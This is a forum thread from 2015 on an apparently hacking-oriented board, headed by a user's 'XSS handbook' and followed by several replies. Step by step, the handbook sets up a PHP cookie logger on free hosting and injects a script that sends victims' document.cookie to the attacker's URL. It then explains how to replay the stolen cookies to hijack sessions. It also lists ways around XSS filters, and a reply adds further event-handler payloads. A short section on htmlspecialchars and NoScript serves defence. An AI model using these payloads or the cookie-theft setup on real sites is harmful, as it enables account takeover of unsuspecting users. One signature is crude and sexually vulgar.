Author Topic: Taku's XSS handbook  (Read 2934 times)

0 Members and 1 Guest are viewing this topic.

Offline taku

  • NULL
  • Posts: 1
  • Cookies: 3
    • View Profile
Taku's XSS handbook
« on: May 30, 2015, 01:35:28 pm »
Introduction
This is going to be my official XSS handbook. I've written a XSS handbook on a different alias, but
decided to leave it due to it being used in too many databases.
Please note that this is not copied, because that would trace back to my old alias.

This handbook is now updated and fixed.

What is XSS?
XSS, also known as cross-site scripting is a web vulnerability. It's caused when the user input
is not sanitized correctly, and is therefore executed.

Let's say there's a search box on a website. If you search for the word "cat" and press enter you'll
probably come to a second page where it says something like "500 results for the word 'cat'".
This means that the websites HTML is looking something like this.

Quote
<h1>500 results for the word 'cat'.</h1>
Now, let's say this website was vulnerable to XSS and you changed your input from cat to HTML code, it's
not sanitized correctly and is executed. Let's say you search for this instead: <script>alert('XSS')</script>.

Now the HTML code would look like this instead.

Quote
<h1>500 results for the word '<script>alert('XSS')</script>'</h1>
What the website will do is it will think that the user input is actually a part of the website, and it'll execute the Javascript code resulting in a
popup saying "XSS".

There's been a number of interesting uses of XSS over the years. One of the most recognized uses
was by a guy called Samy Kamkar. He successfully executed Javascript on his MySpace profile.
What he did was creating a Javascript worm, so as fast as anyone would visit Samy's MySpace profile, the
Javascript payload would run, adding the Payload to their own profile and change their bio to "But most of all, Samy is my hero".

In fact, I read just a while ago on the forum that the chatbox on Alphas.sx was vulnerable to XSS.
Luckily, for us the attacker - was a skid. He didn't put a dangerous payload on it. He could of done a lot worse stuff than he actually did,
like stealing cookies of users or making them; just like Samy did, changing their profiles.

XSS can be very harmful if it's used correctly.

Different attack methods
In XSS there's a number of different attack methods. I'll go over some of the most common ones with you.

- Non-Persistent XSS
This is the most common one of all XSS attack methods.
It's the vulnerabilties that are not stored on the website, but is parsed in for example a URL.
This include website searches and is usually found in forms that are never stored, the same thing I explained before.

For someone to exploit the vulnerable on an another user, he'd have to craft a link and send it to the target.
Let's imagine the search XSS I talked about earlier. The URL might look something like this:

Quote
http://www.website.com/search.php?q=search+here
The search+here would be replaced with the XSS payload.

- Persistent XSS
This one is actually the rarest type of XSS. This is found in comments, bio's, chat logs, etc - the ones where the text is stored on the website unless it's removed
by someone like an administrator.
The XSS found on the forum was persistent, as fast as anyone would visit the chatbox the payload would be executed.

- DOM-Based XSS
This attack method is basically useless. There's no way you can attack a user this way unless you trick them to enter your Javascript payload
in the vulnerable form/URL.
This vulnerability is similar to Non-Persistent XSS, but there's no URL crafted, so there's no way for you to make the victim
run the payload. The DOM-based XSS results in you just modifying the DOM enviornment in the victims browser.

Cookie Catching
Cookies are small files which are stored on a user's computer. They are usually seen as strings and are ran in the users browser.
This allows the server of a website to deliver a page tailored to a particular user.
For example, if you were to log into Facebook and make sure the "Remember me" button is checked a unique cookie file is stored on your computer.
Next time you visit Facebook, it's going to look for the cookie - and if you have it, it's automatically going to log you in.
If you can steal these cookies with, let's say a XSS vulnerability in Facebook, you can use those cookies in your own session to authorize as someone else. (Which the skid in the chatbox could of done, but didn't)

To start stealing cookies you have to set up your own websites with a PHP script.
I prefer using http://3owl.com or http://000webhost.com/. Once you've created an account you can log in and go to your file manager.
Here you're going to create a file, name it whatever you want - I'll go with cookie.php.

The file is going to contain this PHP code:
Quote
<?php

$cookie = $HTTP_GET_VARS[" c"];
$file = fopen('cookielog.txt', 'w');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";

?>
Once you've created it you'll have your URL with the PHP script on. It'll look something like this:
Quote
http://www.website.3owl.com/cookie.php
Now, go to the vulnerable website and enter this XSS payload:

Quote
<script>document.location= "http://www.website.3owl..com/cookie.php?c=" + document.cookie; </script>
What this will do is to redirect the site to your cookie logging script, and add the cookie after the "c=", and store the string in a textfile called cookielog.txt.
You can later go to your file manager and see if you've got any cookies.

To use someone's cookie you can use any cookie editor, like Advanced Cookie Manage which you can install as an addon through your browser.

Bypass Techniques
Most admins will put different filters trying to avoid XSS. Some of these methods are:

- magic_quotes_gpc=ON
- HEX encoding
- Obfuscation

magic_quotes_gpc=ON bypass
This is a very well known filter, and is also used to prevent SQLi and other vulnerabilities.
What it does is after every single quote (') and double quote (") it's escaped with a backslash.

The way you bypass this is by using the Javascript function String.fromCharCode().

Just convert your payload into decimals by using a tool like this http://www.asciizeichen.de/tabelle.html

HEX encoding bypass
This kind of explains itself, you simply encode your XSS payload into HEX.
For example, the XSS payload:
<script>alert(1)</script> would look like this %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

You can use websites like http://www.swingnote.com/tools/texttohex.php for this.

Obfuscation
This filter is the worst filter against XSS if it's not used correctly, and there's an extremely easy way of bypassing it.
What this filter does is it has different words like "script" and "alert" on a blacklist of words, so whenever someone tries to write them they're censored.
If the administrator is stupid you can easily bypass this by writing the payload like this:

Quote
<sCrIpT>aLerT(1)</sCriPt>
EXTRA METHOD
Sometimes you have to be a bit creative with your payloads and have a look at the source code.
You might have to write your payloads like this:

Quote
"><script>alert(1);</script>
or

Quote
</p><script>alert(1);</script>
There's endless of possibilities to this method.

How to fix XSS vulnerabilities
Obviously because we're in the "Security" section we have to learn how to secure your website against XSS threats.
There's a number of ways to fix XSS vulnerabilities, but I'm going to name the most common one.

Let's imagine that there's a search box on your website that's vulnerable to XSS.
You go into the PHP code of the search box and have a closer look.

If it's storing the user input in a variable like 'search' you have to add a secure function to it, to make it sanitized.
Let's imagine the result page's PHP code is:

Quote
<?php
echo ($_GET['search']);
?>
Instead of having it posting the user-input directly, we have to sanitize it first.
We can do this by changing the PHP code to

Quote
<?php
echo htmlspecialchars($_GET['search']);
?>
When you search for something It's going to show the same way, but the user-input is now sanitized and not taken literally.

XSS defense as a user
A good defense against XSS as a user is by using addons like noscript. What this addon does it not allowing
Javascript to be run on a website unless you allow it. So if someone sends you a link with a Javascript payload on
it wont execute unless you allow it to and it's trusted.

Last words
Writing this stuff is harder than you think. I hope you all learnt something new and that you enjoyed reading this.
If you liked this handbook, please take your time to reply to it and tell me what you learnt.
Also, feel free to ask questions if you have any problems.

Offline gjiqlVHs

  • NULL
  • Posts: 4
  • Cookies: -1
    • View Profile
Re: Taku's XSS handbook
« Reply #1 on: February 11, 2016, 03:32:28 pm »
This handbook is a good introduction to the basics of XSS, and provides some good detail on the 'backend' in succinct terms.

It might also be good to mention how DOM-Based XSS can be exploited through social engineering, most people trust a link if the domain name is correct!

Nice content, thanks for posting.

Offline blindfuzzy

  • VIP
  • Peasant
  • *
  • Posts: 86
  • Cookies: 34
    • View Profile
Re: Taku's XSS handbook
« Reply #2 on: February 11, 2016, 09:25:38 pm »
Where's the handbook? All I see is your thread with common knowledge material.

Offline m0rph

  • The People's Champ
  • VIP
  • Peasant
  • *
  • Posts: 50
  • Cookies: 44
  • Master Debator
    • View Profile
    • unkn0wn
Re: Taku's XSS handbook
« Reply #3 on: February 17, 2016, 02:53:46 pm »
Where's the handbook? All I see is your thread with common knowledge material.
Pardon me my good Sir, but, in your opinion, what would some non-common XSS techniques consist of?

(for everyone else blindfuzzy, as is our usual banter)
The code is strong with this one.

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: Taku's XSS handbook
« Reply #4 on: February 17, 2016, 03:22:18 pm »
Pardon me my good Sir, but, in your opinion, what would some non-common XSS techniques consist of?

(for everyone else blindfuzzy, as is our usual banter)

BLOOD OF THE INNOCENT XSS is pretty l33t.

Also I found your mom to be a pretty uncommon XSS

#rekt
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline blindfuzzy

  • VIP
  • Peasant
  • *
  • Posts: 86
  • Cookies: 34
    • View Profile
Re: Taku's XSS handbook
« Reply #5 on: February 17, 2016, 05:52:12 pm »
Pardon me my good Sir, but, in your opinion, what would some non-common XSS techniques consist of?

(for everyone else blindfuzzy, as is our usual banter)

I was just referring to the info posted as common knowledge. You can google XSS and find all this in better formatting with more information.

Funny his post almost looks like this one: https://www.exploit-db.com/papers/13646/

Anywho some less common vectors for XSS include:
1″ onmouseover=alert(“xss”); “
“onload=’confirm(“test XSS”)’
” onload=window.open(www.google.com)
” onload=’javascript:alert(1)’

You can exploit these when the input parameter value is reflected in HTML input tag or in other HTML code.
You can also XSS the file upload functionality by uploading an html file with xss type of script. Things get more tricky with a site that is locked down with ASP and there are various fuzzing techniques to bypass the ASP xss protection.
« Last Edit: February 17, 2016, 06:27:43 pm by blindfuzzy »

Offline Trap_lord

  • /dev/null
  • *
  • Posts: 19
  • Cookies: -20
    • View Profile
Re: Taku's XSS handbook
« Reply #6 on: February 19, 2016, 05:52:19 pm »
This isn't bad at all content wise. Nice way for people wanting to learn xss to wet their beak a bit. Don't know why you got heat for the post?

I found this xss tutorial series on youtube. Its pretty good for covering the basics if you guys are interested.

https://www.youtube.com/watch?=M_nIIcKTxGk&index=1&list=PL1A2CSdiySGIRec2pvDMkYNi3iRO89Zot

Staff Note: No double posting
« Last Edit: February 24, 2016, 06:12:26 pm by iTpHo3NiX »
This is your life and it's ending one minute at a time - Fight Club(1999)